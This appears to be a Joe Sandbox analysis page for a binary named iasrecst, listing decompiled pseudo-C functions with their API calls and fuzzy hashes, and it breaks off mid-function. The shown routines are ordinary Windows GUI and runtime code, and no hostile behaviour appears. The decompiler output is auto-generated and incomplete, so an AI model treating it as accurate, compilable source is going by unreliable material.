Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction ID: 25fbbff43e00deea4677d8a477c73a5b9be4ee826b54bccf5d226778cb27c547
Opcode Fuzzy Hash: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction Fuzzy Hash: DFE0803EF0123646D72137647C0436E66D49F88360FE5D17BDB41423555A7C484346BE

Uniqueness

Uniqueness Score: -1.00%

Function 00426D87, Relevance: 9.2, APIs: 6, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00426D87(void* __ecx) {
				struct HDC__* _t87;
				intOrPtr* _t88;
				struct HDC__* _t97;
				intOrPtr _t98;
				int _t100;
				struct HDC__* _t110;
				int _t122;
				intOrPtr* _t126;
				void* _t136;
				intOrPtr* _t137;
				struct HDC__** _t138;
				int _t153;
				intOrPtr _t157;
				signed short _t171;
				int _t175;
				void* _t178;
				void* _t180;

				E00406520(E0042A133, _t180);
				_t178 = __ecx;
				 *(__ecx + 0x70) =  *(_t180 + 8);
				_t87 = E004131DD(0x3c);
				 *(_t180 + 8) = _t87;
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00428824(_t87);
				}
				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
				_t175 = 1;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
				_t97 = E004131DD(0x40);
				 *(_t180 + 8) = _t97;
				_t186 = _t97;
				 *(_t180 - 4) = _t175;
				if(_t97 == 0) {
					_t98 = 0;
					__eflags = 0;
				} else {
					_t98 = E00428A66(_t97, _t186);
				}
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
				if(_t100 != 0) {
					_t137 = _t178 + 0x78;
					E00419BB7(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
					 *(_t178 + 0x84) = _t175;
					 *((intOrPtr*)( *_t137 + 0x1c))();
					_t110 = GetDC( *(_t178 + 0x1c));
					 *(_t180 + 8) = _t110;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
					_t138 = _t178 + 0x80;
					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
					_t188 = _t122;
					 *(_t178 + 0xf8) = _t122;
					if(_t122 != 0) {
						_t153 =  *(_t178 + 0xf0);
						__eflags = _t122 - _t153;
						if(__eflags > 0) {
							 *(_t178 + 0xf8) = _t153;
						}
					} else {
						 *(_t178 + 0xf8) = _t175;
					}
					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
					_push(0x42e4b0);
					_push(0x42e4b0);
					_push(_t175);
					_push(_t175);
					_push(_t175);
					E0041AE9C(_t178, _t188);
					_t126 =  *((intOrPtr*)(_t178 + 0x114));
					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
					} else {
						 *((intOrPtr*)(_t180 - 0x24)) = 3;
						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
						 *(_t180 - 0x18) = _t175;
						if(E00415006(_t178, _t175, _t180 - 0x28, 0) == 0) {
							E00414F60(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
						}
					}
					E00427C71(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
					_t100 = _t175;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return _t100;
			}

APIs

__EH_prolog.LIBCMT ref: 00426D8C
GetDC.USER32(?), ref: 00426E7B
ReleaseDC.USER32 ref: 00426EAF
GetDeviceCaps.GDI32(?,00000058), ref: 00426EC8
GetDeviceCaps.GDI32(?,0000005A), ref: 00426ED8

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0042E4B0,0042E4B0), ref: 00426FA0

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CapsDeviceH_prolog$ReleaseScrollShow
String ID:
API String ID: 603669091-0
Opcode ID: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction ID: f5d210ee154f7f1b627b2ce3caee5c8d10a4320e645ae6f080698531d27b521b
Opcode Fuzzy Hash: 479707f173c4057112b4671a433d92b04c0141629a29cc01e59d35c96becf872
Instruction Fuzzy Hash: E0716870600A00DFCB29DF68D984AAABBF5FF48310F51456EE56ACB3A1DB34E841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A040, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A040(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x42f5e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x439f04; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x439efc; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00406830(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406330(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x439eec; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x42f5cc, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x42f5c8, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x439f04 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

APIs

GetStringTypeW.KERNEL32(00000001,0042F5CC,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A07F
GetStringTypeA.KERNEL32(00000000,00000001,0042F5C8,00000001,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A099
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A0CD
MultiByteToWideChar.KERNEL32(00406E03,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00406E03,00000001,00000020,00000100,?,00000000), ref: 0040A105
MultiByteToWideChar.KERNEL32(00406E03,00000001,00000100,00000020,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A15B
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,00406E03,00000001,00000020,00000100,?), ref: 0040A16D

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction ID: 7d97f644f5b15e7df2d58104b9ea96a21cdc8e77f8ddbf007f82d689378feb8c
Opcode Fuzzy Hash: 7978bb901a9e5ef37ad4b01f25115386a243d4b412b3fda7648c38b4a11906ce
Instruction Fuzzy Hash: 7B41A272600219BFCF219F54CC85EAF3F79EB08350F104536F911E6290D3398961CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00424DFE, Relevance: 9.1, APIs: 6, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00424DFE(intOrPtr __ecx, void* __esi) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t58;
				signed int _t59;
				signed int _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				void* _t88;
				CHAR** _t90;
				void* _t91;

				E00406520(E0042A538, _t91);
				_t84 = __ecx;
				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
				_t51 = E00424F37(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
				if(_t51 == 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t51;
				}
				_t97 =  *((intOrPtr*)(_t91 + 8));
				 *((intOrPtr*)(_t91 - 0x18)) = 1;
				if( *((intOrPtr*)(_t91 + 8)) == 0) {
					L18:
					E0042500B(_t84, 1, 1);
					_t51 =  *((intOrPtr*)(_t91 - 0x18));
					goto L19;
				}
				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
				_push(0);
				_t88 = _t53;
				E0041A369(_t91 - 0x38, _t97);
				 *(_t91 - 4) = 0;
				 *(_t91 - 0x14) = 0;
				if(_t88 != 0) {
					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
				}
				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
				 *(_t91 - 0x10) = 0;
				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
					L15:
					if( *(_t91 - 0x14) != 0) {
						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
					}
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					E0041A3DB(_t91 - 0x38);
					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
					goto L18;
				} else {
					_t14 = _t86 + 0x10; // 0x10
					_t90 = _t14;
					do {
						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
						_t100 = _t58;
						 *_t86 = _t58;
						if(_t58 == 0) {
							_t59 = GetSystemMetrics(0);
							asm("cdq");
							_t77 = 4;
							__eflags =  *(_t91 - 0x10);
							 *(_t90 - 0xc) = _t59 / _t77;
							if(__eflags == 0) {
								_t33 = _t90 - 8;
								 *_t33 =  *(_t90 - 8) | 0x08000100;
								__eflags =  *_t33;
							}
							goto L12;
						}
						if(E00417214(_t90, _t100, _t58) == 0) {
							L14:
							 *((intOrPtr*)(_t91 - 0x18)) = 0;
							goto L15;
						}
						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
						 *(_t90 - 0xc) =  *(_t91 - 0x24);
						_push(0);
						_push( *_t90);
						_push( *(_t91 - 0x10));
						if(E0041BD0A( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
							goto L14;
						}
						L12:
						_t86 = _t86 + 0x14;
						_t90 =  &(_t90[5]);
						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
					goto L15;
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00424E03
SendMessageA.USER32 ref: 00424E3E

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SelectObject.GDI32(?,00000000), ref: 00424E5D
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00424EA5
GetSystemMetrics.USER32 ref: 00424EC7
SelectObject.GDI32(?,?), ref: 00424F04

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
String ID:
API String ID: 3673216194-0
Opcode ID: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction ID: de80a065bd08caa13eaac1d81a7ee75adb8ed78cffc769f96184ddddc36f8564
Opcode Fuzzy Hash: 5680769445a0563b957df53e84ae2bb9e9ca5e2116424480a2c0b347b83c8ba0
Instruction Fuzzy Hash: 2D419D71A00219EFDB20DF95E8859AEFBB5FF88344F91402AF911A3250C7749A41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420341, Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00420341(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t59 = GetCapture;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E00413740(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E00413740(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E00420031(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t31 = _v32.message - 0x100;
						if(_t31 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E0041FA60(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t33 = E00413740(_t61, GetCapture());
								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t35 = _t31 - 1;
						if(_t35 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E0041FA60(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t37 = _t35 - 0xff;
						if(_t37 == 0) {
							_t55 = _v32.pt;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t58 = _v8;
							_push(_t55);
							_push(_t55);
							_t38 = _t62;
							 *_t38 = _t55;
							 *((intOrPtr*)(_t38 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E0041FCEC(_t56, _t59);
							} else {
								E0041F9E4(_t56);
							}
							goto L18;
						}
						_t42 = _t37;
						if(_t42 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E0041FE54(_t61, __eflags);
							} else {
								E0041FA94(_t57, _t58, _t59, _t60, __eflags);
							}
							_t44 = 1;
							return _t44;
						}
						if(_t42 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					E00429977(_v32.wParam);
					goto L19;
				}
			}

APIs

GetCapture.USER32 ref: 00420352
SetCapture.USER32(?), ref: 00420362
GetCapture.USER32 ref: 0042036E
GetMessageA.USER32 ref: 00420388
DispatchMessageA.USER32 ref: 004203BA
GetCapture.USER32 ref: 00420418

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction ID: 30569a75dd2c4bd339c842e90f3a76f558b8e988fa3a176c692722e66ec8e41b
Opcode Fuzzy Hash: a20fd4fb0c2347bab3a65a9823309a38aaeff76aa6fb72db20377e06dd9c9868
Instruction Fuzzy Hash: 103197717002299BDB21BBA5A8459AFB7E8EF40345FD0C43FA505D2253CE3C9C82D769

Uniqueness

Uniqueness Score: -1.00%

Function 00425A9A, Relevance: 9.1, APIs: 6, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E00425A9A(long* __ecx, signed int _a4, intOrPtr _a8) {
				void* _v8;
				void* __ebp;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t39;
				signed int* _t45;
				void* _t58;
				long* _t61;

				_push(__ecx);
				_t61 = __ecx;
				_t58 = TlsGetValue( *__ecx);
				if(_t58 == 0) {
					_t28 = E00425860(0x10);
					if(_t28 == 0) {
						_t58 = 0;
					} else {
						 *_t28 = 0x42e2ac;
						_t58 = _t28;
					}
					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
					_t8 = _t58 + 8; // 0x8
					_t45 = _t8;
					_t9 =  &(_t61[7]); // 0x4399c8
					_v8 = _t58;
					EnterCriticalSection(_t9);
					_t11 =  &(_t61[5]); // 0x4399c0
					_t48 = _t11;
					E00425807(_t11, _t58);
					_t12 =  &(_t61[7]); // 0x4399c8
					LeaveCriticalSection(_t12);
					goto L8;
				} else {
					_t2 = _t58 + 8; // 0x8
					_t45 = _t2;
					if(_a4 >=  *_t45 && _a8 != 0) {
						L8:
						_t32 =  *(_t58 + 0xc);
						if(_t32 != 0) {
							_t15 =  &(_t61[3]); // 0x4
							_t48 =  *_t15 << 2;
							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
						} else {
							_t14 =  &(_t61[3]); // 0x4
							_t33 = LocalAlloc(0,  *_t14 << 2);
						}
						 *(_t58 + 0xc) = _t33;
						if(_t33 == 0) {
							E0041007F(_t48);
						}
						_t17 =  &(_t61[3]); // 0x4
						E00406330( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
						_t21 =  &(_t61[3]); // 0x4
						 *_t45 =  *_t21;
						TlsSetValue( *_t61, _t58);
					}
				}
				_t39 =  *(_t58 + 0xc);
				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
				return _t39;
			}

APIs

TlsGetValue.KERNEL32(004399AC,004397CC,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AA5
EnterCriticalSection.KERNEL32(004399C8,00000010,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425AF4
LeaveCriticalSection.KERNEL32(004399C8,00000000,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B07
LocalAlloc.KERNEL32(00000000,00000004,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B1D
LocalReAlloc.KERNEL32(?,00000004,00000002,?,004399AC,?,00425D02,004397CC,00000000,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C), ref: 00425B2F
TlsSetValue.KERNEL32(004399AC,00000000), ref: 00425B6B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction ID: c57f163ce3b349da1c9d5fe6ec490a1136d0d73abae7d2378efdd78ccfe309f5
Opcode Fuzzy Hash: fa5c56b83de37dfc572e7405fe9a137b2415a0e8034dc68c49179741276c41e2
Instruction Fuzzy Hash: 96318031200A15EFD724DF15E88AE6AB7B8FF44354F80C66AE416C7650E774F815CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041445E, Relevance: 9.1, APIs: 6, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0041445E(intOrPtr* __ecx, void* __edi) {
				struct HWND__* _t33;
				int _t35;
				void* _t37;
				void* _t52;
				void* _t53;
				intOrPtr* _t57;
				void* _t58;
				void* _t60;

				_t53 = __edi;
				E00406520(E00429E3C, _t60);
				_push(__ecx);
				_t57 = __ecx;
				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00424BFB() + 4));
				E00424BFB();
				E00412F19();
				 *(_t60 - 4) = 0;
				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
					 *((intOrPtr*)( *_t57 + 0xf0))();
				}
				_push(_t53);
				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t48 = _t57;
				_t58 = E00414CEF(_t57);
				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
				E00414E86(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t33 = GetCapture();
				if(_t33 != 0) {
					SendMessageA(_t33, 0x1f, 0, 0);
				}
				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
				_t65 = _t35;
				if(_t35 == 0) {
					_push(0xffffffff);
					_push(0);
					_push(0xf107);
					E0041BB7E(_t48, _t65);
				}
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				E00424BFB();
				_t37 = E00412F2E();
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t37;
			}

APIs

__EH_prolog.LIBCMT ref: 00414463
SendMessageA.USER32 ref: 004144B0
SendMessageA.USER32 ref: 004144D2
GetCapture.USER32 ref: 004144E4
SendMessageA.USER32 ref: 004144F3
WinHelpA.USER32 ref: 00414507

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction ID: 80e039248a87347babf29178317820bee1b7ca75e73936699edc63578028a574
Opcode Fuzzy Hash: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction Fuzzy Hash: 15219571300205BFEB20AF65DC89FAA7BA9FF44754F118129F245971E2CBB4DC419B64

Uniqueness

Uniqueness Score: -1.00%

Function 004232C5, Relevance: 9.1, APIs: 6, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004232C5(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
				struct tagRECT _v20;
				struct HBRUSH__* _t46;
				long _t50;
				struct HBRUSH__* _t52;
				intOrPtr _t59;
				struct HBRUSH__* _t60;
				long _t64;
				struct HBRUSH__* _t66;
				intOrPtr _t70;
				intOrPtr _t72;

				CopyRect( &_v20, _a8);
				_v20.right = _v20.left + _a12;
				_t46 = _a20;
				if(_t46 != 0) {
					_t46 =  *(_t46 + 4);
				}
				_t72 = _a4;
				FillRect( *(_t72 + 4),  &_v20, _t46);
				_t50 = _a8->right;
				_v20.right = _t50;
				_v20.left = _t50 - _a12;
				_t52 = _a20;
				if(_t52 != 0) {
					_t52 =  *(_t52 + 4);
				}
